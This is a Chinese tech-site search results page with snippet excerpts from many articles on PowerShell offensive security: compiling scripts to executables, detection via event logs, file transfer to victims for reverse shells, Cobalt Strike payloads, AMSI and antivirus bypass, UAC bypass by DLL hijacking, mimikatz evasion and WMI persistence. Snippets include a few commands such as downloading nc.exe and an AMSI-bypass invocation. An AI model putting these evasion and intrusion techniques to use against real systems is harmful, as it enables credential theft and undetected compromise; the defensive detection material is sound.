首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

如何使用PS2EXEPowerShell脚本编译为可执行程序

关于PS2EXE PS2EXE是一个可以将PowerShell脚本编译为可执行程序模块,在GUI和Ingo Karstein脚本支持下,该模块能够生成真正Windows可执行程序。...除此之外,PS2EXE还支持PowerShell 5.x和图形化前端。...注意事项 有一些人可能会滥用PS2EXE来编译他计算机病毒脚本,因此越来越多病毒扫描程序会将使用PS2EXE创建程序识别为恶意程序并将其删除。因此,希望大家不要将其用于恶意目的。...\target.exe”的话,生成文件将为“.\source.exe”。...位或64位代码 lcid = 编译可执行程序位置ID STA或MTA = 单线程模式或多线程模式 noConsole = 生成可执行文件为Windows应用程序,不带终端窗口 UNICODEEncoding

2K20

如何利用日志来监控和限制PowerShell攻击活动

下面给出是一个简单样例: 其中,cmd.js是一个远程脚本,它能够目标设备内存中远程调用calc.exe,整个过程不会在硬盘中留下任何痕迹。...(IoC)列表: –WindowStyle hidden / -w hidden: 隐藏程序窗口 –Exec Bypass: 绕过类似Restricted之类程序执行策略 –Command / -c...观察PowerShell父进程和子进程之间关系 一般来说,当我们开始菜单或磁盘目录中直接运行PowerShell的话,它会在explorer.exe进程下运行。...Windows安全事件日志如何帮助我们检测PowerShell攻击 接下来,我们一起看看Windows事件日志如何帮助我们识别上述介绍IoC。...相关功能介绍以及启用方法可访问以下资料获取:[阅读原文] 事件ID 4688可以根据SIEM生成警报信息来给我们提供三条关键信息,我们可以使用这两条信息来检测PowerShell攻击: 1.

2.2K50
您找到你想要的搜索结果了吗?
是的
没有找到

针对黑客Windows文件传输总结

我们将介绍如何将文件攻击者计算机传输到受害者 Windows 10 主机(下载),以及如何受害者 Windows 10 主机传输回攻击者计算机(上传)各种技术。...作为黑客,我们经常发现我们需要向受害者投放工具,或者需要将我们漏洞下载到内存中。无论哪种方式,我们都需要知道如何将这些工具或漏洞发送给受害者,更重要是,我们需要知道实现这一目标的多种方法。...通过攻击者计算机上共享,我们实际上可以直接共享文件夹在受害者上执行文件。例如,我们可以使用共享中 nc.exe 获取反向 shell,而无需将其复制到受害者。...并非所有这些二进制文件都可以与 evil-winrm 一起使用,因为它只允许 .Net 程序集( C# 编译可执行文件)在内存中执行。...现在我们已经了解了如何将可执行文件攻击者计算机直接加载到受害者内存中,让我们看看如何加载 PS1 脚本,因为我们还使用了 -s开关。

45911

四十六.Powershell和PowerSploit脚本攻防万字详解

PowerShell包含两个应用程序组件:基于文本标准控制台(powershell.exe)和集成命令环境图形化界面(ISE:powershell_ise.exe)。...不同操作系统内置Powershell是不一样,比如win7或win2008。 (2) 其次,如何查看版本呢?...常见优点包括: Windows 7以上操作系统默认安装 PowerShell脚本可以运行在内存中,不需要写入磁盘 可以另一个系统中下载PowerShell脚本并执行 目前很多工具都是基于PowerShell...举个例子来看管道是如何工作,假设停止所有目前运行汇总以 “p” 字符开头命名程序,命令如下: get-process p* | stop-process 管道并不是什么新事物,以前Cmd控制台也有重定向命令...压缩,Base-64编码,并输出生成代码,以将受管理DLL加载到内存中 Remove-Comments.ps1 脚本中删除注释和多余空白 Persistence(权限维持) New-UserPersistenceOption

29110

CobalStrike 4.0 生成后门几种方式 及 主机上线后基础操作

程序包生成一个HTML应用,该应用运行一个CobaltSt rikepayload。你可以选择可执行选项来获取一个HTML应用,此HTML应用使得一个可执行文件落地在磁盘上并运行它。...使用VBA选项来静默派生一个MicrosoftExcel实例并运行一个恶意宏来将payload注入到内存中。...也就是说,普通EXE和服务器启动调用EXE是有区别是。...利用Windows ServiceEXE生成EXE才能用来作为服务自启动EXE,利用Cobalt Strike中Windows exe生成EXE不能作为服 务自启动EXE程序(因为不能响应Service...在⽬标上内存中执⾏本地.NET程序 22. exit 终⽌beacon会话 23. getprivs Enable system privileges on current token 24. getsystem

3.3K10

四十二.Powershell恶意代码检测系列 (3)PowerSploit脚本渗透详解

PowerShell包含两个应用程序组件:基于文本标准控制台(powershell.exe)和集成命令环境图形化界面(ISE:powershell_ise.exe)。...不同操作系统内置Powershell是不一样,比如win7或win2008。 (2) 其次,如何查看版本呢?...常见优点包括: Windows 7以上操作系统默认安装 PowerShell脚本可以运行在内存中,不需要写入磁盘 可以另一个系统中下载PowerShell脚本并执行 目前很多工具都是基于PowerShell...举个例子来看管道是如何工作,假设停止所有目前运行汇总以 “p” 字符开头命名程序,命令如下: get-process p* | stop-process 管道并不是什么新事物,以前Cmd控制台也有重定向命令...压缩,Base-64编码,并输出生成代码,以将受管理DLL加载到内存中 Remove-Comments.ps1 脚本中删除注释和多余空白 Persistence(权限维持) New-UserPersistenceOption

2.8K30

Powershell免杀入门到实践

团队免杀系列又有了远控免杀入门到实践(6)-代码篇-Powershell更是拓宽了自己认知。这里继续学习powershell在对抗Anti-Virus骚姿势。...绕过执行策略 powershell 可以通过绕过执行策略来执行恶意程序。 而文件是否落地可以简单分为落地bypass、不落地bypass。...分析CobaltStrike powershell command 这里使用CobaltStrike 4.1来生成payload ? 访问83端口a文件,获取payload代码。...那同样可以远程文件读取shellcode,并加载到内存执行,来实现payload无落地。...powershellexe 在修改了加载器之后,我们还可以通过powershell代码将其加载器转换为exe程序。 借助Win-PS2EXE项目,通过ps2exe.ps1脚本将加载器转为exe文件。

2.7K30

针对哈萨克斯坦基于多阶段 PowerShell 攻击

分析 嵌入 lnk 文件被混淆,去混淆后我们可以看到它使用 cmd.exe 调用 PowerShell Github 帐户(lib7.ps1)下载并执行攻击第一阶段。...技术 2 — 使用 sysprep.exe 系统实用程序和 DLL 劫持加载: 首先,创建一个帮助程序脚本以重新启动目录 C:\Windows\Temp 中 PowerShell 脚本。...然后使用 wusa.exe 系统实用程序将此存档解压缩到文件夹 C:\Windows\System32\Sysprep 中。...接下来,sysprep.exe 系统实用程序启动,加载先前解压 DLL,然后 DLL 继续执行帮助脚本。然后PowerShell 脚本将以管理员权限重新启动,绕过 UAC。...最后,sysprep.exe 系统实用程序启动哪一侧加载 Windows 7 CRYPTBASE.dll 或 Windows 8 shcore.dll。

93220

实战中如何绕过杀软用mimikatz获取账号密码

目标机system权限,安装了360,准备获取密码。 mimikatzexe,powershell版(可上github下载)网上版本已经被360已及各种杀软杀死死,扔上去就挂 ?...在win10运行,成功获取账号密码: ? 扔到Win7上试试,出现报错 ? 因为win7powershell版本为2.0 ?...既然可以远程加载powershell绕过杀软,那远程加载exe也同样可以,powershell加载exe内存运行需要PowerSploit中Invoke-ReflectivePEInjection脚本...我们远程加载Invoke-ReflectivePEInjection再远程加载调用mimikatz.exe内存以无文件落地方式绕过杀软读取账号密码(绕过PowerShell下载攻击弹窗方式同上),命令如下..." -ForceASLR -PEUrl :包含要加载和执行DLL / EXEURL -ExeArgs :所要执行命令 ?

1.7K20

技术分享-持久性-WMI事件订阅

,因为 Windows 有一个可以与 WMI (wmic) 交互实用程序,并且也可以利用 PowerShell。...mofcomp.exe ./Metasploit.mof 在这种情况下,payload 是通过 Metasploit “ web_delivery/ ”模块使用 regsvr32 方法远程获取。...WMI-Persistence是另一个 PowerShell 脚本,它可以创建事件过滤器,在每次重新启动后 5 分钟内远程位置执行基于 PowerShell 有效负载。...默认情况下,此工具使用记事本,这是一个常见 Windows 应用程序,但可以修改代码以针对任何其他常见进程,例如 word.exe、outlook.exe、excel.exe、calc.exe,具体取决于主机收集信息在态势感知期间...“ wmi_updater ” 模块能够远程位置获取有效负载,而不是将其存储在 WMI 存储库中。它将注册为“ AutoUpdater ”,并且可以在启动时或一天中特定时间设置触发器。

2.5K10

获取Windows系统密码凭证总结

根据上述过程,我们可以看出,最直接获取Windows凭证方法,无非就是想办法lsass.exe进程中或sam数据库中获取。...Windows 凭证获取 使用powershell脚本 powershell脚本:[1] https://raw.githubusercontent.com/samratashok/nishang/master..., 主要用于桌面应用开发人员对应用一些检测处理,我们使用Procdump实现主要功能是将正在运行程序生成静态文件 方便我们进行分析操作,我在上述介绍中提过,处理我们密码程序是lsass.exe,...而这里我们也主要会将它进行静态文件,.然后再将此文件目标电脑中导出至本地。...特点 文件落地 mimikatz 功能强大 文件落地(可以内存加载) powershell 使用方便 内存加载 Pwddump7 和powershell脚本类似 内存加载 Procdump 微软官方工具

59410

A Detailed Guide on AMSI Bypass

是开放,因此任何AV都可以其函数中读取数据,在这里正在运行一个Windows脚本,当它通过AMSI时,amsi.dll被注入到与我们程序相同虚拟内存中,这个amsi.dll有各种可以评估代码函数...,此处不会绕过实际有效负载 Microsoft已将AMSI集成在powershell终端(powershell.exe应用程序)中,该终端接收输入并通过Powershell引擎对其进行解析,如果我们打开进程黑客并搜索...,在某些方法中使用字节码,在其他方法中替换函数或替换字符串,但逻辑相同 Method 4: Powershell内存劫持 Daniel Duggan在他博客中介绍了关于绕过AMSI内存劫持技术,逻辑是...,将类型绑定到现有对象,或现有对象获取类型并调用其方法或访问其字段和属性,如果您在代码中使用属性,反射使您能够访问它们 Paul Laine在此处contextis.com博客上发布了原始内存劫持方法...\nishang.ps1 Invoke-AmsiBypass -Verbose "invoke-mimikatz" 文末小结 在本文中我们讨论了AMSI基础知识、如何程序中使用它们、工作流程以及绕过它们

1.5K20

D盾防火墙防护绕过-

这里我们可以利用进程注入方式来绕过,首先加载powershell扩展,使用powershell_shell命令进入交互模式下执行powershell得到一个x64conhost.exe进程来进行当前会话进程迁移...因为在这种场景下当前权限运行进程只有w3wp.exe,没有其它同权限进程用于进程迁移,所以只能利用powershell扩展得到个conhost.exe进程用于执行迁移。...如果遇到执行powershell但并没有conhost.exe进程情况,可能是需要多执行几次才会有。...注意事项: 这种方式是将shellcode加载到w3wp.exe内存中运行,但非常容易造成IIS应用程序池崩溃,访问网站出现503报错,所以还请谨慎使用。...而且获取会话经常会断开,不适合运行在w3wp.exe、conhost.exe,所以还是得在绕过D盾防火墙【执行限制】后再单独运行一个Payload。

2.5K20

Mimikatz18种免杀姿势及防御策略

4、加载器分离免杀加载器就是利用了ShellCode和PE分离方式来达到免杀效果,在远控免杀专题中介绍过不少很好用加载器,不过很多只能加载基于RAW格式或固定格式shellcode,对exe程序就无能无力了...方法5-PowerShell嵌入EXE文件(VT查杀率15/58) 这个方法其实只是将exe程序转为字符串,然后嵌入到Invoke-ReflectivePEInjection.ps1中直接执行。...方法6-C程序中执行powershell(VT查杀率7/71) 这个执行方式也是比较简单,在C代码里执行powershell。...WDigest问题是它将密码存储在内存中,并且无论是否使用它,都会将其存储在内存中。 默认在win2008之前是默认启用。但是在win2008之后系统上,默认是关闭。...,mimiktaz抓不到明文;UseLogonCredential 值设置为 1, WDigest把凭证缓存在内存,mimiktaz可以获取到明文。

2.8K20

Powershell绕过执行及脚本混淆

Powershell 可以作为一个应用程序在 cmd 中执行,cmd 也可以在 Powershell 中执行。 为什么 powershell 能够执行 cmd 命令?...|powershell.exe -NoP - -noprofile 简写 -NoP, 为不加载 windows poweshell 配置文件 你也可以网络上下载脚本并执行,这样就不会写入磁盘和修改配置文件...5.PSConsole: 使用 PSConsole 指定 powershell 控制文件 powershell 脚本分析 几个较为常用执行脚本语句: 1、本地绕过执行策略执行脚本 PowerShell.exe...,它包含了 DownloadFile 方法远程下载文件,和 Download-String 方法下载数据到内存缓冲区,减少了数据落地内存留下痕迹可能。...知攻焉知防,既然了解了 powershell 最基础攻击方法,那么了解如何检测 powershell 攻击活动也是必不可少如何检测powershell攻击活动

2.7K00

浅谈PowerShell在渗透测试中应用

0x01 PowerShell简介 Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework强大功能。...Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework强大功能。...代码运行在内存中可以不去接触磁盘 很多安全产品并不能监测到powershell活动 cmd.exe通常被阻止运行,但是powershell不会。 ?...0x02 常用命令及一般攻击方式 -WindowsStyle Hidden 隐藏自己窗口 -ExecutionPolicy Bypass 绕过策略 Get-Content .runme.ps1 | PowerShell.exe..."http://10.0.0.10/nc.exe" -outfile "nc.exe" 获取帮助 get-help 进程相关 start-process get-process stop-process

1.9K20
领券